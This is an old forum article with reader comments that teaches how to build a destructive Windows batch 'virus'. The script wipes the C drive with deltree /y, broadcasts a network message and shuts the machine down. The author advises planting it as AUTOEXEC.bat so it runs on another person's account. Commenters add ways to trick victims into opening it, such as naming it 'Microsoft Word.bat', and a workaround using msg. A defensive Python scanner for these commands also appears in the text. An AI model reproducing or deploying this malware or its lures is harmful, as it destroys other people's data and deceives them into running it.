Constructing an easy virus


By ghostghost | 7649 Reads |

INTRO:

This article is based on .bat files that can be coded for malicious purposes. This "batch programming" would be an easy thing to write for someone who knows how to work DOS and its commands. I personally don't consider this a "virus," but more of a, "Specially crafted computer f*cker." Seeing as most people call this kind of coding a "virus," and I bet it got your attention, I'll leave the title as is. Everyone reading this should first know how to use DOS and its commands appropriately. If not, I suggest you read up on it so you can make a personal "virus," instead of the ones shown in this article. If you're a Unix and/or Linux user, DOS is basically the equivalent of a terminal. DOS just has the commands worded differently and some even work differently. Seeing as most people use Windows, I'll base my article on Windows commands.

THE BASICS:

Let's see what DOS is really about before we continue. To get to DOS, go to the Start button, choose Run, then type either cmd or command in the box and press Enter. In most cases, this should be blocked for normal users. I won't explain how to get past this because there are several articles on it already. You can type help and read up on how the commands work. When you're pretty used to it and what it can do, continue to my next paragraph. Now that you know what DOS is, or at least you should, we'll go into the two file types (there may be more) that will be used to use DOS to its "full advantage." ;) These two file types are .cmd (command) and .bat (batch). Both file types will run right through DOS, anonymously if used correctly. The file type we will be using is .bat.

SEEING HOW IT WORKS:

Just so you see how a simple .bat works, go to Notepad and make a file called test. Now, remember what directory it's in and the folders/sub-folders you saved it into. Now, go to Notepad and type:

copy H:\test.txt H:\test

Now, save this as anything with a .bat extension (like test.bat). It is not in the pull-down list, so you will have to write it in manually. Now, go to the directory/folder/sub-folder area you saved it to. Then, double-click the .bat file. What should happen is a black box should pop up and disappear pretty quickly. Now, depending on how big the file is and how fast your computer is, you may end up viewing the command processing. When it gets done, the box will disappear. Now, go to where you saved the file (H:\test) and see if file.txt is there. If it is, congratulations, you just wrote your first batch program. Very basic, I know, but it gets you some practice with it.

SAVES:

There are two different saving techniques. The batch file you made above worked when you double-clicked the file. There is another save that will auto-execute itself on login. Delete your file.txt file(s) created from your last command, go back to Notepad and write this:

copy H:\file.txt H:\file

(switching out for your own directory and folder). Now, you want to save this one as AUTOEXEC.bat. Save it into C:\. If you don't have access, do it in DOS or just use another batch file; you should know how to do it by now.

(*hint) copy H:\AUTOEXEC.bat C:\

Now, restart your computer and log in. You should see the same thing happen as your last command, but this time without clicking it. Once you're finally logged in, if you didn't see the command process, go check where you saved it to and see if the file (file.txt) is there. If it is there, you just accomplished a different save style.

CONSTRUCTING:

Now that you know how to work the different saves and you know how the batch is executed, let's compile a basic "virus." Write these commands without the //'d words:

@echo off //Turns the echo off, so it won't display on screen, discreet if command completes fast

deltree c:\* /y //deletes the entire C drive without prompting on deletion

Net Send * "The System is Down" //sends a message to everyone on the network

shutdown -s //shuts down the computer, need admin-like privileges for this command to process.

Take out the extra spaces. What that will do is execute those commands and then shut down the computer. I suggest using the AUTOEXEC.bat so it would execute itself on someone else's account. If net send is blocked on your computer, do not use it. The command will stop at net send if it is blocked correctly.

PROTECTION:

This may sound like a nightmare for any administrator, but it isn't. To fix this all you have to do is boot up into safe mode and find where the file is and delete it. Then you may have to fix whatever damage was done by the code.
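To help with the "find where the file is" step, the sketch below triages batch files by the commands this article and its comments use. It is an added example, not part of the original article; the function `scan_batch`, the rule names, the weights and both sample scripts are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Rules cover only the commands shown in this article and its comments.
# Rule names and weights are assumptions made for this example.
RULES = [
    ("delete-without-prompt", 5, re.compile(r"^\s*@?deltree\b.*\s/y\b", re.I)),
    ("broadcast-message", 2, re.compile(r"^\s*@?(net\s+send|msg)\s+\*", re.I)),
    ("shutdown", 2, re.compile(r"^\s*@?shutdown\b.*\s[-/]s\b", re.I)),
]
AUTOSTART_NAMES = {"autoexec.bat"}  # login-time file name the article relies on


def scan_batch(path, text):
    """Return (score, findings) for one batch file's contents."""
    findings, score = [], 0
    for lineno, line in enumerate(text.splitlines(), 1):
        # Skip batch comments so documentation does not trigger rules.
        if re.match(r"^\s*(rem\b|::)", line, re.I):
            continue
        for name, weight, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name))
                score += weight
    # A flagged script that also runs automatically deserves more attention.
    if findings and PureWindowsPath(path).name.lower() in AUTOSTART_NAMES:
        findings.append((0, "autostart-location"))
        score += 3
    return score, findings


# Constructed samples: the article's script and a harmless copy script.
SAMPLE_BAD = '@echo off\ndeltree c:\\* /y\nNet Send * "The System is Down"\nshutdown -s\n'
SAMPLE_OK = "@echo off\nrem shutdown -s would go here\ncopy H:\\file.txt H:\\file\n"

if __name__ == "__main__":
    for path, text in [("C:\\AUTOEXEC.bat", SAMPLE_BAD), ("H:\\test.bat", SAMPLE_OK)]:
        score, findings = scan_batch(path, text)
        print(path, score, findings)
```

The score is a triage hint rather than a verdict, since legitimate administration scripts also call shutdown.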

END:

Now that you know how to work the "virus," be creative. Like, if all you want to do is shut down the computer as soon as it starts up, simply write:

shutdown -s

Then, save it as AUTOEXEC.bat. There are several switches for that command, but remember that the user needs admin-like privileges for that command to execute. This was a very basic article and if you want to learn more, there's always Google.

CREDITS:

Neither I nor this site takes any responsibility for what you do with this information. This article was written and meant for educational purposes only.

Nights Shadow

Comments
ghost 19 years ago

Well, considering you can't actually deltree C last I checked.. It's not too bad, a little too far into malicious intentions, without enough supporting knowledge, but most newbies start here. Brava.

ghost 19 years ago

nah it's not a virus… but meh, lol try START ME.BAT

AND SAVE IT AS ME.BAT, IT'S HILARIOUS… anyhow, deltree c doesn't work in XP, you can try it. I can't remember the way round it but I think there was one involving NULL

ghost 19 years ago

Nor does XP use AUTOEXEC.bat anymore (well, that's a lie, you can still use it for env. vars) so that renders it somewhat useless. Deltree does not work in XP either, that also takes away a few points. Again, like the VB one, this is merely annoying, it is freestanding (whatever uses batch interpreter), does not propagate itself, etc.

Learn a programming language, learn some system internals, and go to 29a: http://29a.vx.netlux.org/main.html

ghost 18 years ago

Lol tries on own computer

Rofl wolf, far more effective is saving it as DONOTOPENTHIS.BAT, as some noob is bound to come along and open it out of curiosity…

ghost 18 years ago

lol I made this one little one similar, and I almost opened it into my own comp

thk-geo 18 years ago

If netsend is blocked you can use "Msg * ''The System is Down''" Good article though

ghost 17 years ago

Change Microsoft word's name to something else and then save it as Microsoft Word.bat, some idiot will be bound to click on it. And also, I doubt Deltree works on xp too, because you're not allowed to just format xp computers.

ghost 17 years ago

LAME faggot thing here.

A batch virus haha you gotta be kidding.

Night_Stalker 17 years ago

If you put net send then deltree c: */y, would it delete all the network's c:\s?

ghost 17 years ago

hm…doesn't it say, "It's not a virus" - > I personally don't consider this a "virus," but more of a, "Specially crafted computer f*cker."

Maybe some people (coughx2fusion*/cough*) should read the article and not just the title ;)